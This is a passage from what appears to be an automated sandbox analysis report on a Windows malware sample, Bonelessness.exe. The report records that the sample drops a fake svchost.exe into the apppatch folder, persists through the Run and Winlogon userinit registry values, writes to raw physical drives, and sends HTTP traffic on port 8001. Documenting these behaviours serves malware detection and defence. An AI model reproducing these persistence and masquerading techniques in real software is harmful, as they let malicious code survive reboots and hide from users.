      Source: svchost.exe.0.drStatic PE information: section name: .LI
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_0044AD50 push eax; ret 0_2_0044AD7E
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_022B0802 push ebx; ret 0_2_022B084C
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_022B084D push dword ptr [esp+48h]; ret 0_2_022B091C
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_022B0FB8 push C0C66DD3h; retf 0_2_022B10C7
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_022B1784 push ebx; iretd 0_2_022B178E
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_0044AD50 push eax; ret 1_2_0044AD7E
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D68AE3 push cs; ret 1_2_02D68AF8
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D68B19 push cs; iretd 1_2_02D68B28
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D64950 push eax; ret 1_2_02D6497E
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D6844D push es; iretd 1_2_02D6845C
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02505D50 push eax; ret 1_2_02505D7E
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02981784 push ebx; iretd 1_2_0298178E
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02980FB8 push C0C66DD3h; retf 1_2_029810C7
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02980802 push ebx; ret 1_2_0298084C
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_0298084D push dword ptr [esp+48h]; ret 1_2_0298091C
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028D8AE3 push cs; ret 5_2_028D8AF8
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028D8B19 push cs; iretd 5_2_028D8B28
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028D4950 push eax; ret 5_2_028D497E
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028D844D push es; iretd 5_2_028D845C
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E898E3 push cs; ret 5_2_00E898F8
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E6C8AC push ebp; retf 5_2_00E6C8AD
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E761BC push ebp; retf 5_2_00E761BD
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E89919 push cs; iretd 5_2_00E89928
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E8924D push es; iretd 5_2_00E8925C
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E86207 push cs; retf 0004h5_2_00E86301
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E76442 push ebp; retf 5_2_00E76443
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E85D50 push eax; ret 5_2_00E85D7E
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E85E42 push eax; retf 5_2_00E85E69
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E85F4C pushad ; retn 0004h5_2_00E85F55
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E85F22 push ds; ret 5_2_00E85F29
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_02488AE3 push cs; ret 6_2_02488AF8

      Persistence and Installation Behavior

      barindex
      Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u1_2_02D33000
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u5_2_028A3000
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u6_2_02453000
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u8_2_012F3000
      Source: C:\Users\user\Desktop\Bonelessness.exeFile created: C:\Windows\apppatch\svchost.exeJump to dropped file
      Source: C:\Users\user\Desktop\Bonelessness.exeExecutable created and started: C:\Windows\apppatch\svchost.exeJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: API: WriteFile string: \\?\globalroot\systemroot\system32\tasks\0_2_004033B0
      Source: C:\Users\user\Desktop\Bonelessness.exeFile created: C:\Windows\apppatch\svchost.exeJump to dropped file
      Source: C:\Users\user\Desktop\Bonelessness.exeFile created: C:\Windows\apppatch\svchost.exeJump to dropped file

      Boot Survival

      barindex
      Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u1_2_02D33000
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u5_2_028A3000
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u6_2_02453000
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u8_2_012F3000
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run userinitJump to behavior
      Source: C:\Windows\apppatch\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon userinitJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run userinitJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run userinitJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: c:\users\user\desktop\bonelessness.exeFile moved: C:\Users\user\AppData\Local\Temp\5FC5.tmpJump to behavior
      Source: unknownNetwork traffic detected: HTTP traffic on port 51116 -> 8001
      Source: unknownNetwork traffic detected: HTTP traffic on port 8001 -> 51116
      Source: unknownNetwork traffic detected: HTTP traffic on port 8001 -> 51116
      Source: unknownNetwork traffic detected: HTTP traffic on port 51119 -> 8001
      Source: unknownNetwork traffic detected: HTTP traffic on port 8001 -> 51119
      Source: unknownNetwork traffic detected: HTTP traffic on port 64294 -> 8001
      Source: unknownNetwork traffic detected: HTTP traffic on port 8001 -> 64294
      Source: unknownNetwork traffic detected: HTTP traffic on port 64295 -> 8001
      Source: unknownNetwork traffic detected: HTTP traffic on port 8001 -> 64295
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D2CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,1_2_02D2CBF0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D2CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,1_2_02D2CBF0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D2CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,1_2_02D2CBF0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D2CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,1_2_02D2CBF0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D2CB80 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,1_2_02D2CB80
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D2D130 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,1_2_02D2D130
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D2CE19 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,1_2_02D2CE19
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D2CE19 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,1_2_02D2CE19
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D29C80 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,1_2_02D29C80
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_0289CB80 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,5_2_0289CB80
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_0289CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0289CBF0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_0289CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0289CBF0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_0289CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0289CBF0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_0289CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0289CBF0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_0289D130 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,5_2_0289D130
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_0289CE19 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0289CE19
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_0289CE19 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0289CE19
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_02899C80 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,5_2_02899C80
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0244CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0244CBF0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0244CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0244CBF0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0244CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0244CBF0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0244CBF0 SendMessageA,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0244CBF0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0244CB80 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,6_2_0244CB80
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0244D130 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,6_2_0244D130
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0244CE19 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0244CE19
